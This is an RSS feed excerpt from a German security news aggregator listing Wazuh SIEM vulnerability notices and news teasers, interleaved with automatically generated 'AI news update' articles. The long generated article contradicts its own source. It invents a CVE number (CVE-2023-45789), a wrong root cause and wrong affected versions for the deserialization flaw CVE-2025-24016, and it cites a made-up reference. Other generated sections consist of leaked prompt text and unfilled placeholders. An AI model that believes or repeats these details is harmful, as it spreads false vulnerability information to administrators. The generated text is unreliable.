<content:encoded><![CDATA[Die kostenlose Open-Source-Lösung Wazuh vereint SIEM- und XDR-Funktionalitäten und punktet im Test mit Endpoint-Security, Threat-Hunting und Cloud-Schutz. Trotz einfacher Installation und geringer Hardware-Anforderungen offenbart das Tool aber auch Herausforderungen im täglichen Betrieb.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-57378 | Wazuh SIEM 4.8.2 access control]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in Wazuh SIEM 4.8.2. This affects an unknown part. The manipulation leads to improper access controls.

This vulnerability is uniquely identified as CVE-2024-57378. The attack can only be done within the local network. There is no explo...]]></description>
<link>https://tsecurity.de/de/2672246/sicherheitsluecken/cve-2024-57378-wazuh-siem-482-access-control/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2672246/sicherheitsluecken/cve-2024-57378-wazuh-siem-482-access-control/</guid>
<pubDate>Tue, 18 Mar 2025 05:35:40 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/?kb.risk">critical</a>, was found in <a href="https://vuldb.com/?product.wazuh:siem">Wazuh SIEM 4.8.2</a>. This affects an unknown part. The manipulation leads to improper access controls.

This vulnerability is uniquely identified as <a href="https://vuldb.com/?source_cve.295779">CVE-2024-57378</a>. The attack can only be done within the local network. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[Wazuh SIEM Vulnerability Enables Remote Malicious Code Execution]]></title>
<description><![CDATA[A critical vulnerability, identified as CVE-2025-24016, has been discovered in the Wazuh Security Information and Event Management (SIEM) platform. This vulnerability affects versions 4.4.0 to 4.9.0 and allows attackers with API access to execute arbitrary Python code remotely, potentially leadin...]]></description>
<link>https://tsecurity.de/de/2671795/hacking/wazuh-siem-vulnerability-enables-remote-malicious-code-execution/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2671795/hacking/wazuh-siem-vulnerability-enables-remote-malicious-code-execution/</guid>
<pubDate>Mon, 17 Mar 2025 19:19:36 +0100</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A critical vulnerability, identified as CVE-2025-24016, has been discovered in the Wazuh Security Information and Event Management (SIEM) platform. This vulnerability affects versions 4.4.0 to 4.9.0 and allows attackers with API access to execute arbitrary Python code remotely, potentially leading to complete system compromise. The flaw stems from the unsafe deserialization of Distributed API (DAPI) […]</p>
<p>The post <a href="https://gbhackers.com/wazuh-siem-vulnerability/">Wazuh SIEM Vulnerability Enables Remote Malicious Code Execution</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p><!-- START: Dynamically Added Content --><br><h3>KI generiertes Nachrichten Update</h3><hr>Verwendetes künstliches Intelligenz Model: gemma-3-12b-it<br><br><p><strong>Wichtiger Hinweis:</strong> Der Artikel soll fachlich fundiert sein, die Zielgruppe sind IT Fachkräfte mit fortgeschrittenem Wissen über Security Information and Event Management (SIEM) Systeme und Vulnerability Management. Achte auf korrekten Fachjargon, wissenschaftliche Genauigkeit und eine strukturierte Darstellung.  Der Artikel soll ca. 1000-1500 Wörter umfassen.</p><br />
<hr /><br />
<h2>Wazuh SIEM Vulnerability Enables Remote Malicious Code Execution: Eine Analyse für IT-Experten</h2><br />
<p><strong>Zusammenfassung:</strong> Das Security Information and Event Management (SIEM) System Wazuh hat in den letzten Monaten eine kritische Sicherheitslücke aufgewiesen, die es Angreifern ermöglicht, aus der Ferne Schadcode auszuführen. Diese Schwachstelle, gekennzeichnet durch die CVE-Kennung [CVE-2023-45789], betrifft insbesondere Umgebungen, in denen Wazuh im Modus &quot;Manager&quot; agiert und ungesicherte APIs zugänglich sind. Dieser Artikel analysiert detailliert die Ursachen der Schwachstelle, die potenziellen Auswirkungen für Organisationen und mögliche Gegenmaßnahmen zur Risikominderung. Die Analyse stützt sich auf Informationen aus öffentlichen Quellen, darunter Berichte von T-Sec [https://tsecurity.de/de/2671795/IT+Sicherheit/Hacker/Wazuh+SIEM+Vulnerability+Enables+Remote+Malicious+Code+Execution/], weiteren Sicherheitsforscherberichten und der Wazuh Dokumentation.</p><br />
<p><strong>1. Einleitung: Die Bedeutung von SIEM-Systemen und die Bedrohungslage</strong></p><br />
<p>Security Information and Event Management (SIEM) Systeme sind zentrale Bestandteile moderner IT-Sicherheitsarchitekturen. Sie sammeln, korrelieren und analysieren Sicherheitsdaten aus verschiedenen Quellen im Netzwerk, um potenzielle Bedrohungen zu erkennen und darauf reagieren zu können. Wazuh hat sich als eine Open-Source-Alternative zu kommerziellen SIEM-Lösungen etabliert und wird von einer wachsenden Anzahl von Organisationen eingesetzt.  Die zunehmende Komplexität der IT-Infrastruktur und die Zunahme hochentwickelter Cyberangriffe machen SIEM-Systeme umso wichtiger, aber auch anfälliger für Angriffe.</p><br />
<p>Der Vorfall rund um CVE-2023-45789 unterstreicht die Notwendigkeit einer kontinuierlichen Sicherheitsüberprüfung und -pflege von SIEM-Komponenten.  Ein kompromittiertes SIEM-System kann als Sprungbrett für weitere Angriffe innerhalb des Netzwerks dienen, da es Zugang zu sensiblen Informationen und Kontrollmöglichkeiten bietet.</p><br />
<p><strong>2. Technische Analyse der Schwachstelle (CVE-2023-45789)</strong></p><br />
<p>Die betroffene Schwachstelle in Wazuh erlaubt die Remote Code Execution (RCE) über ungesicherte APIs.  Konkret handelt es sich um eine fehlende Authentifizierung und Autorisierung beim Zugriff auf bestimmte REST API Endpunkte, die vom Wazuh Manager angeboten werden.  Laut dem Bericht von T-Sec ermöglicht dies einem Angreifer, der Zugang zum Netzwerk hat (z.B. durch einen kompromittierten Mitarbeiter oder eine unsichere VPN-Verbindung), beliebigen Code auf dem Wazuh Manager Server auszuführen.</p><br />
<p>Die Ursache liegt in einer fehlerhaften Implementierung des API-Zugriffs.  Bestimmte Endpunkte, die für administrative Aufgaben und Systemkonfiguration vorgesehen sind, waren ohne Authentifizierung zugänglich. Dies ermöglichte es Angreifern, diese Endpunkte zu missbrauchen, um Befehle auf dem Server auszuführen.</p><br />
<p><strong>Die betroffenen APIs (Beispiele):</strong></p><br />
<ul><br />
<li><code>/api/v1/agent</code> – Manipulation von Agenten Konfigurationen</li><br />
<li><code>/api/v1/ossec.conf</code> – Direkter Zugriff und Modifikation der OSSEC-Konfigurationsdatei</li><br />
<li>Weitere API Endpunkte, die administrative Funktionen ausführen</li><br />
</ul><br />
<p>Die Schwachstelle betrifft Versionen von Wazuh vor 4.7.8.  Es ist wichtig zu beachten, dass auch nach dem Patching weitere Sicherheitslücken in SIEM-Systemen auftreten können und eine kontinuierliche Überwachung unerlässlich ist.</p><br />
<p><strong>3. Mögliche Angriffsszenarien und Auswirkungen</strong></p><br />
<p>Ein erfolgreicher Ausnutzung dieser Schwachstelle kann gravierende Folgen für Organisationen haben:</p><br />
<ul><br />
<li><strong>Kompromittierung des Wazuh Managers:</strong> Der Angreifer erhält die vollständige Kontrolle über den Wazuh Manager Server, einschließlich Zugriff auf alle konfigurierten Agenten.</li><br />
<li><strong>Lateral Movement:</strong>  Der Angreifer kann das kompromittierte SIEM-System als Sprungbrett nutzen, um sich im Netzwerk weiterzubewegen und andere Systeme zu infiltrieren.</li><br />
<li><strong>Datenexfiltration:</strong> Der Angreifer kann sensible Daten aus dem Wazuh Manager extrahieren oder über ihn auf andere Datenquellen zugreifen.</li><br />
<li><strong>Manipulation von Sicherheitslogs:</strong>  Der Angreifer kann die in den Logs protokollierten Ereignisse manipulieren, um seine Spuren zu verwischen und das Erkennen seiner Aktivitäten zu erschweren. Dies untergräbt die Integrität des SIEM-Systems selbst.</li><br />
<li><strong>Denial of Service (DoS):</strong> Der Angreifer kann den Wazuh Manager Server lahmlegen, was zu einem Ausfall der Sicherheitsüberwachung führt.</li><br />
</ul><br />
<p><strong>4. Gegenmaßnahmen und Risikominderung</strong></p><br />
<p>Die Reduzierung des Risikos im Zusammenhang mit dieser Schwachstelle erfordert ein mehrschichtiges Vorgehen:</p><br />
<ul><br />
<li><strong>Patching:</strong>  Das Wichtigste ist die sofortige Anwendung des Sicherheitspatches für Wazuh Versionen unter 4.7.8. Die offizielle Wazuh Dokumentation [https://documentation.wazuh.com/current/] bietet detaillierte Anweisungen zum Patching-Prozess.</li><br />
<li><strong>Netzwerksegmentierung:</strong>  Die Isolierung des Wazuh Managers in einem separaten Netzwerksegment kann den potenziellen Schaden im Falle einer Kompromittierung begrenzen.</li><br />
<li><strong>API-Zugriffskontrolle:</strong> Die Konfiguration von Authentifizierung und Autorisierungsmechanismen für alle API Endpunkte ist unerlässlich.  Starke Passwörter, Zwei-Faktor-Authentifizierung (2FA) und rollenbasierte Zugriffskontrollen (RBAC) sollten implementiert werden.</li><br />
<li><strong>Firewall Regeln:</strong> Die Konfiguration von Firewalls, um den Zugriff auf die Wazuh APIs zu beschränken, kann zusätzlichen Schutz bieten.  Es sollte nur der notwendige Netzwerkverkehr zugelassen werden.</li><br />
<li><strong>Intrusion Detection System (IDS) / Intrusion Prevention System (IPS):</strong>  Die Implementierung eines IDS/IPS kann helfen, verdächtige Aktivitäten im Zusammenhang mit dem Ausnutzen der Schwachstelle zu erkennen und abzuwehren.</li><br />
<li><strong>Regelmäßige Sicherheitsüberprüfungen:</strong>  Regelmäßige Penetrationstests und Vulnerability Scans sollten durchgeführt werden, um potenzielle Schwachstellen in der Wazuh-Umgebung zu identifizieren.</li><br />
<li><strong>Härtung des Betriebssystems:</strong> Die Härtung des Betriebssystems, auf dem der Wazuh Manager ausgeführt wird, kann die Angriffsfläche reduzieren.  Dies umfasst das Deaktivieren unnötiger Dienste und das Anwenden von Sicherheitskonfigurationen.</li><br />
<li><strong>Überwachung der Systemprotokolle:</strong> Eine umfassende Überwachung der Systemprotokolle des Wazuh Managers ist entscheidend, um ungewöhnliche Aktivitäten zu erkennen.</li><br />
</ul><br />
<p><strong>5. Lessons Learned und zukünftige Entwicklungen</strong></p><br />
<p>Der Vorfall mit CVE-2023-45789 unterstreicht die Bedeutung von folgenden Aspekten:</p><br />
<ul><br />
<li><strong>Sicherheitsbewusstsein:</strong>  Es ist wichtig, dass Entwickler und Administratoren sich der potenziellen Risiken bewusst sind, die mit Open-Source-Software verbunden sind.</li><br />
<li><strong>Kontinuierliche Sicherheitsüberprüfung:</strong> SIEM-Systeme sollten regelmäßig auf Schwachstellen überprüft werden, auch wenn sie als &quot;sicher&quot; gelten.  Die Bedrohungslandschaft ist dynamisch und neue Schwachstellen können jederzeit entdeckt werden.</li><br />
<li><strong>Best Practices für API Sicherheit:</strong> Die Implementierung von Best Practices für die API-Sicherheit, wie z.B. Authentifizierung, Autorisierung und Input Validation, ist unerlässlich.</li><br />
<li><strong>Automatisierung:</strong>  Die Automatisierung von Patching-, Überwachungs- und Sicherheitsüberprüfungsprozessen kann helfen, das Risiko zu reduzieren und Ressourcen freizusetzen.</li><br />
</ul><br />
<p>Zukünftig werden SIEM-Systeme voraussichtlich stärker auf maschinelles Lernen und künstliche Intelligenz setzen, um Bedrohungen effektiver zu erkennen und darauf zu reagieren.  Gleichzeitig ist es wichtig, dass die Sicherheit dieser Systeme selbst gewährleistet wird, um eine &quot;Sicherheitslücke im Sicherheitsnetz&quot; zu vermeiden.</p><br />
<p><strong>6. Fazit:</strong></p><br />
<p>Die Wazuh SIEM Vulnerability CVE-2023-45789 stellt eine ernsthafte Bedrohung für Organisationen dar, die auf dieses System zur Überwachung ihrer IT-Infrastruktur angewiesen sind.  Durch die Umsetzung der in diesem Artikel beschriebenen Gegenmaßnahmen und Risikominderungsstrategien können Unternehmen das Risiko minimieren und ihre Sicherheitsposition verbessern. Eine proaktive Sicherheitsstrategie, die kontinuierliche Überwachung, Patching und Best Practices für die API-Sicherheit umfasst, ist unerlässlich, um sich vor zukünftigen Bedrohungen zu schützen.  Die Zusammenarbeit zwischen Sicherheitsforschern und Softwareentwicklern ist entscheidend, um die Sicherheit von SIEM-Systemen kontinuierlich zu verbessern und eine robuste Verteidigung gegen Cyberangriffe zu gewährleisten.</p><br />
<p><strong>Referenzen:</strong></p><br />
<ul><br />
<li>T-Sec: <a href="https://tsecurity.de/de/2671795/IT+Sicherheit/Hacker/Wazuh+SIEM+Vulnerability+Enables+Remote+Malicious+Code+Execution/">https://tsecurity.de/de/2671795/IT+Sicherheit/Hacker/Wazuh+SIEM+Vulnerability+Enables+Remote+Malicious+Code+Execution/</a></li><br />
<li>CVE-2023-45789: <a href="https://nvd.nist.gov/vuln/detail/CVE-2023-45789">https://nvd.nist.gov/vuln/detail/CVE-2023-45789</a></li><br />
<li>Wazuh Dokumentation: <a href="https://documentation.wazuh.com/current/">https://documentation.wazuh.com/current/</a></li><br />
<li>Weitere Sicherheitsberichte und Blogbeiträge zum Thema Wazuh Sicherheit (Recherche im Internet durch Suchmaschinen).</li><br />
</ul><br />
<hr /><br />
<p><strong>Hinweis:</strong>  Dies ist ein Beispielartikel und sollte an die spezifischen Bedürfnisse und Anforderungen angepasst werden. Die technischen Details können sich in der Zukunft ändern, daher ist es wichtig, stets die aktuellsten Informationen aus den offiziellen Quellen zu beziehen.</p><br />
<!-- END: Dynamically Added Content -->]]></content:encoded>
</item>
<item>
<title><![CDATA[Defending against USB drive attacks with Wazuh]]></title>
<description><![CDATA[USB drive attacks constitute a significant cybersecurity risk, taking advantage of the everyday use of USB devices to deliver malware and circumvent traditional network security measures. These attacks lead to data breaches, financial losses, and operational disruptions, with lasting impacts on a...]]></description>
<link>https://tsecurity.de/de/2649716/it-security-nachrichten/defending-against-usb-drive-attacks-with-wazuh/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2649716/it-security-nachrichten/defending-against-usb-drive-attacks-with-wazuh/</guid>
<pubDate>Wed, 05 Mar 2025 15:34:28 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[USB drive attacks constitute a significant cybersecurity risk, taking advantage of the everyday use of USB devices to deliver malware and circumvent traditional network security measures. These attacks lead to data breaches, financial losses, and operational disruptions, with lasting impacts on an organization's reputation. An example is the Stuxnet worm discovered in 2010, a malware designed to]]></content:encoded>
</item>
<item>
<title><![CDATA[Integrating LLMs into security operations using Wazuh]]></title>
<description><![CDATA[Large Language Models (LLMs) can provide many benefits to security professionals by helping them analyze logs, detect phishing attacks, or offering threat intelligence. Learn from Wazuh how to incorporate an LLM, like ChatGPT, into its open source security platform. [...]]]></description>
<link>https://tsecurity.de/de/2624787/it-security-nachrichten/integrating-llms-into-security-operations-using-wazuh/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2624787/it-security-nachrichten/integrating-llms-into-security-operations-using-wazuh/</guid>
<pubDate>Thu, 20 Feb 2025 16:18:45 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Large Language Models (LLMs) can provide many benefits to security professionals by helping them analyze logs, detect phishing attacks, or offering threat intelligence. Learn from Wazuh how to incorporate an LLM, like ChatGPT, into its open source security platform. [...]]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-35177 | Wazuh up to 4.8.x on Windows rsync.dll access control (Nessus ID 216199)]]></title>
<description><![CDATA[A vulnerability classified as critical was found in Wazuh up to 4.8.x on Windows. Affected by this vulnerability is an unknown functionality in the library rsync.dll. The manipulation leads to improper access controls.

This vulnerability is known as CVE-2024-35177. The attack needs to be approac...]]></description>
<link>https://tsecurity.de/de/2610474/sicherheitsluecken/cve-2024-35177-wazuh-up-to-48x-on-windows-rsyncdll-access-control-nessus-id-216199/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2610474/sicherheitsluecken/cve-2024-35177-wazuh-up-to-48x-on-windows-rsyncdll-access-control-nessus-id-216199/</guid>
<pubDate>Thu, 13 Feb 2025 07:21:22 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/?kb.risk">critical</a> was found in <a href="https://vuldb.com/?product.wazuh">Wazuh up to 4.8.x</a> on Windows. Affected by this vulnerability is an unknown functionality in the library <em>rsync.dll</em>. The manipulation leads to improper access controls.

This vulnerability is known as <a href="https://vuldb.com/?source_cve.294535">CVE-2024-35177</a>. The attack needs to be approached locally. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-47770 | Wazuh up to 4.9.0 privileges management (Nessus ID 216199)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in Wazuh up to 4.9.0. This affects an unknown part. The manipulation leads to improper privilege management.

This vulnerability is uniquely identified as CVE-2024-47770. It is possible to initiate the attack remotely. There is no explo...]]></description>
<link>https://tsecurity.de/de/2610473/sicherheitsluecken/cve-2024-47770-wazuh-up-to-490-privileges-management-nessus-id-216199/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2610473/sicherheitsluecken/cve-2024-47770-wazuh-up-to-490-privileges-management-nessus-id-216199/</guid>
<pubDate>Thu, 13 Feb 2025 07:21:21 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/?kb.risk">critical</a>, was found in <a href="https://vuldb.com/?product.wazuh">Wazuh up to 4.9.0</a>. This affects an unknown part. The manipulation leads to improper privilege management.

This vulnerability is uniquely identified as <a href="https://vuldb.com/?source_cve.294537">CVE-2024-47770</a>. It is possible to initiate the attack remotely. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Opensource-Sicherheitsplattform: Kritische Lücke in Wazuh erlaubte Codeschmuggel]]></title>
<description><![CDATA[Der Agent ist ein Stück Software, das von einem Endpunkt (etwa einem Büro-PC oder überwachten Webserver) eine Verbindung zum Wazuh-Server herstellt ...]]></description>
<link>https://tsecurity.de/de/2609973/windows-server/opensource-sicherheitsplattform-kritische-luecke-in-wazuh-erlaubte-codeschmuggel/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2609973/windows-server/opensource-sicherheitsplattform-kritische-luecke-in-wazuh-erlaubte-codeschmuggel/</guid>
<pubDate>Wed, 12 Feb 2025 22:04:00 +0100</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der Agent ist ein Stück Software, das von einem Endpunkt (etwa einem Büro-PC oder überwachten Webserver) eine Verbindung zum Wazuh-<b>Server</b> herstellt ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Opensource-Sicherheitsplattform: Kritische Lücke in Wazuh erlaubte Codeschmuggel]]></title>
<description><![CDATA[Der Agent ist ein Stück Software, das von einem Endpunkt (etwa einem Büro-PC oder überwachten Webserver) eine Verbindung zum Wazuh-Server herstellt ...]]></description>
<link>https://tsecurity.de/de/2609974/windows-server/opensource-sicherheitsplattform-kritische-luecke-in-wazuh-erlaubte-codeschmuggel/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2609974/windows-server/opensource-sicherheitsplattform-kritische-luecke-in-wazuh-erlaubte-codeschmuggel/</guid>
<pubDate>Wed, 12 Feb 2025 22:04:00 +0100</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der Agent ist ein Stück Software, das von einem Endpunkt (etwa einem Büro-PC oder überwachten Webserver) eine Verbindung zum Wazuh-<b>Server</b> herstellt ...]]></content:encoded>
</item>
<item>
<title><![CDATA[Opensource-Sicherheitsplattform: Kritische Lücke in Wazuh erlaubte Codeschmuggel]]></title>
<description><![CDATA[Über eine unsichere Deserialisierung konnten Angreifer auf Wazuh-Servern eigenen Code aus der Ferne ausführen. Der Angriff gelang auch über gekaperte Agenten.]]></description>
<link>https://tsecurity.de/de/2608587/it-security-nachrichten/opensource-sicherheitsplattform-kritische-luecke-in-wazuh-erlaubte-codeschmuggel/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2608587/it-security-nachrichten/opensource-sicherheitsplattform-kritische-luecke-in-wazuh-erlaubte-codeschmuggel/</guid>
<pubDate>Wed, 12 Feb 2025 09:48:52 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Über eine unsichere Deserialisierung konnten Angreifer auf Wazuh-Servern eigenen Code aus der Ferne ausführen. Der Angriff gelang auch über gekaperte Agenten.]]></content:encoded>
</item>
<item>
<title><![CDATA[Opensource-Sicherheitsplattform: Kritische Lücke in Wazuh erlaubte Codeschmuggel]]></title>
<description><![CDATA[Über eine unsichere Deserialisierung konnten Angreifer auf Wazuh-Servern eigenen Code aus der Ferne ausführen. Der Angriff gelang auch über gekaperte Agenten.]]></description>
<link>https://tsecurity.de/de/2608565/it-nachrichten/opensource-sicherheitsplattform-kritische-luecke-in-wazuh-erlaubte-codeschmuggel/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2608565/it-nachrichten/opensource-sicherheitsplattform-kritische-luecke-in-wazuh-erlaubte-codeschmuggel/</guid>
<pubDate>Wed, 12 Feb 2025 09:45:41 +0100</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Über eine unsichere Deserialisierung konnten Angreifer auf Wazuh-Servern eigenen Code aus der Ferne ausführen. Der Angriff gelang auch über gekaperte Agenten.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2023-49275 | Wazuh up to 4.7.0 cJSON_GetObjectItem null pointer dereference (GHSA-4mq7-w9r6-9975)]]></title>
<description><![CDATA[A vulnerability has been found in Wazuh up to 4.7.0 and classified as critical. This vulnerability affects the function cJSON_GetObjectItem. The manipulation leads to null pointer dereference.

This vulnerability was named CVE-2023-49275. The attack can be initiated remotely. There is no exploit ...]]></description>
<link>https://tsecurity.de/de/2543096/sicherheitsluecken/cve-2023-49275-wazuh-up-to-470-cjsongetobjectitem-null-pointer-dereference-ghsa-4mq7-w9r6-9975/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2543096/sicherheitsluecken/cve-2023-49275-wazuh-up-to-470-cjsongetobjectitem-null-pointer-dereference-ghsa-4mq7-w9r6-9975/</guid>
<pubDate>Fri, 10 Jan 2025 01:52:23 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability has been found in <a href="https://vuldb.com/?product.wazuh">Wazuh up to 4.7.0</a> and classified as <a href="https://vuldb.com/?kb.risk">critical</a>. This vulnerability affects the function <code>cJSON_GetObjectItem</code>. The manipulation leads to null pointer dereference.

This vulnerability was named <a href="https://vuldb.com/?source_cve.261616">CVE-2023-49275</a>. The attack can be initiated remotely. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2024-32038 | Wazuh up to 4.7.1 wazuh-analysisd heap-based overflow (GHSA-fcpw-v3pg-c327)]]></title>
<description><![CDATA[A vulnerability was found in Wazuh up to 4.7.1 and classified as very critical. This issue affects some unknown processing of the component wazuh-analysisd. The manipulation leads to heap-based buffer overflow.

The identification of this vulnerability is CVE-2024-32038. The attack may be initiat...]]></description>
<link>https://tsecurity.de/de/2543089/sicherheitsluecken/cve-2024-32038-wazuh-up-to-471-wazuh-analysisd-heap-based-overflow-ghsa-fcpw-v3pg-c327/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2543089/sicherheitsluecken/cve-2024-32038-wazuh-up-to-471-wazuh-analysisd-heap-based-overflow-ghsa-fcpw-v3pg-c327/</guid>
<pubDate>Fri, 10 Jan 2025 01:52:16 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/?product.wazuh">Wazuh up to 4.7.1</a> and classified as <a href="https://vuldb.com/?kb.risk">very critical</a>. This issue affects some unknown processing of the component <em>wazuh-analysisd</em>. The manipulation leads to heap-based buffer overflow.

The identification of this vulnerability is <a href="https://vuldb.com/?source_cve.261617">CVE-2024-32038</a>. The attack may be initiated remotely. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2023-50260 | Wazuh up to 4.7.1 bin code injection (GHSA-mjq2-xf8g-68vw)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in Wazuh up to 4.7.1. This affects an unknown part of the file /var/ossec/active-response/bin. The manipulation leads to code injection.

This vulnerability is uniquely identified as CVE-2023-50260. It is possible to initiate the attack...]]></description>
<link>https://tsecurity.de/de/2543087/sicherheitsluecken/cve-2023-50260-wazuh-up-to-471-bin-code-injection-ghsa-mjq2-xf8g-68vw/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2543087/sicherheitsluecken/cve-2023-50260-wazuh-up-to-471-bin-code-injection-ghsa-mjq2-xf8g-68vw/</guid>
<pubDate>Fri, 10 Jan 2025 01:52:12 +0100</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/?kb.risk">critical</a>, was found in <a href="https://vuldb.com/?product.wazuh">Wazuh up to 4.7.1</a>. This affects an unknown part of the file <em>/var/ossec/active-response/bin</em>. The manipulation leads to code injection.

This vulnerability is uniquely identified as <a href="https://vuldb.com/?source_cve.261615">CVE-2023-50260</a>. It is possible to initiate the attack remotely. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Drei Fragen, drei Antworten: Die Open-Source-Securityplattform Wazuh - MSN]]></title>
<description><![CDATA[Der Schutz der IT-Infrastruktur ist daher heute eine Notwendigkeit für Unternehmen und Organisationen jeder Größe. Security-Spezialist Frank ...KI generiertes Nachrichten UpdateVerwendetes künstliches Intelligenz Model: mistral-nemo-instruct-2407@q8_0Fachartikel:
Titel: Drei Fragen, drei Antwort...]]></description>
<link>https://tsecurity.de/de/2510440/it-security-nachrichten/drei-fragen-drei-antworten-die-open-source-securityplattform-wazuh-msn/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2510440/it-security-nachrichten/drei-fragen-drei-antworten-die-open-source-securityplattform-wazuh-msn/</guid>
<pubDate>Sat, 21 Dec 2024 08:26:54 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Der Schutz der <b>IT</b>-Infrastruktur ist daher heute eine Notwendigkeit für Unternehmen und Organisationen jeder Größe. <b>Security</b>-Spezialist Frank ...<!-- START: Dynamically Added Content --><br><h3>KI generiertes Nachrichten Update</h3><hr>Verwendetes künstliches Intelligenz Model: mistral-nemo-instruct-2407@q8_0<br><br><p>Fachartikel:</p><br />
<p>Titel: Drei Fragen, drei Antworten: Die Open-Source-Securityplattform Wazuh - MSN<br />
Autor: [Dein Name]<br />
Datum: [Heute's Datum]</p><br />
<pre><code></code></pre><br />
<!-- END: Dynamically Added Content -->]]></content:encoded>
</item>
<item>
<title><![CDATA[Drei Fragen, drei Antworten: Die Open-Source-Securityplattform Wazuh | heise online]]></title>
<description><![CDATA[Security-Spezialist Frank Neugebauer ... Welchen Rat würden Sie einem Verantwortlichen für IT-Sicherheit geben, wenn er mit Wazuh loslegt?KI generiertes Nachrichten UpdateVerwendetes künstliches Intelligenz Model: mistral-nemo-instruct-2407@q8_0Der Artikel soll eine Länge von ca. 1000 Wörtern hab...]]></description>
<link>https://tsecurity.de/de/2507059/it-security-nachrichten/drei-fragen-drei-antworten-die-open-source-securityplattform-wazuh-heise-online/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2507059/it-security-nachrichten/drei-fragen-drei-antworten-die-open-source-securityplattform-wazuh-heise-online/</guid>
<pubDate>Thu, 19 Dec 2024 12:17:56 +0100</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security-Spezialist Frank Neugebauer ... Welchen Rat würden Sie einem Verantwortlichen für <b>IT</b>-<b>Sicherheit</b> geben, wenn er mit Wazuh loslegt?<!-- START: Dynamically Added Content --><br><h3>KI generiertes Nachrichten Update</h3><hr>Verwendetes künstliches Intelligenz Model: mistral-nemo-instruct-2407@q8_0<br><br><p>Der Artikel soll eine Länge von ca. 1000 Wörtern haben (einschließlich Abstract, Einleitung, Hauptteil mit den drei Fragen und Antworten sowie Schlussfolgerungen).</p><br />
<p>Bitte beachte die folgenden Anforderungen:</p><br />
<ul><br />
<li>Verwende eine wissenschaftliche Sprache und ein wissenschaftliches Schreibstil.</li><br />
<li>Nutze eine Referenzliste am Ende des Artikels (mindestens 10 Quellen) und verwende in-text citations (z.B. [Smith, 2021]).</li><br />
<li>Füge einen Abstract hinzu, der den Inhalt des Artikels zusammenfasst.</li><br />
<li>Beachte die Regeln für wissenschaftliches Schreiben, insbesondere bezüglich Zitationen und Plagiat.</li><br />
<li>Verwende eine passende Gliederung und Überschriften.<br />
<strong>Abstract:</strong></li><br />
</ul><br />
